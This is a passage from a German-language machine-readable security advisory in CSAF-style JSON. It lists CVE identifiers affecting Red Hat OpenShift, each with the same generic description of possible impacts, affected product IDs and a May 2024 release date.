"CVE-2023-3618" }, { "cve": "CVE-2023-37453", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-37453" }, { "cve": "CVE-2023-3817", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-3817" }, { "cve": "CVE-2023-38469", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38469" }, { "cve": "CVE-2023-38470", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38470" }, { "cve": "CVE-2023-38471", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38471" }, { "cve": "CVE-2023-38472", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38472" }, { "cve": "CVE-2023-38473", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38473" }, { "cve": "CVE-2023-38546", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-38546" }, { "cve": "CVE-2023-39189", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-39189" }, { "cve": "CVE-2023-39193", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-39193" }, { "cve": "CVE-2023-39194", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-39194" }, { "cve": "CVE-2023-39198", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-39198" }, { "cve": "CVE-2023-39326", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-39326" }, { "cve": "CVE-2023-40745", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-40745" }, { "cve": "CVE-2023-41175", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-41175" }, { "cve": "CVE-2023-4133", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-4133" }, { "cve": "CVE-2023-42754", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-42754" }, { "cve": "CVE-2023-42756", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-42756" }, { "cve": "CVE-2023-43785", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-43785" }, { "cve": "CVE-2023-43786", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-43786" }, { "cve": "CVE-2023-43787", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-43787" }, { "cve": "CVE-2023-43788", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-43788" }, { "cve": "CVE-2023-43789", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-43789" }, { "cve": "CVE-2023-4408", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-4408" }, { "cve": "CVE-2023-45286", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45286" }, { "cve": "CVE-2023-45287", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45287" }, { "cve": "CVE-2023-45288", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45288" }, { "cve": "CVE-2023-45289", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45289" }, { "cve": "CVE-2023-45290", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45290" }, { "cve": "CVE-2023-45857", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45857" }, { "cve": "CVE-2023-45863", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-45863" }, { "cve": "CVE-2023-46218", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-46218" }, { "cve": "CVE-2023-46862", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-46862" }, { "cve": "CVE-2023-47038", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen 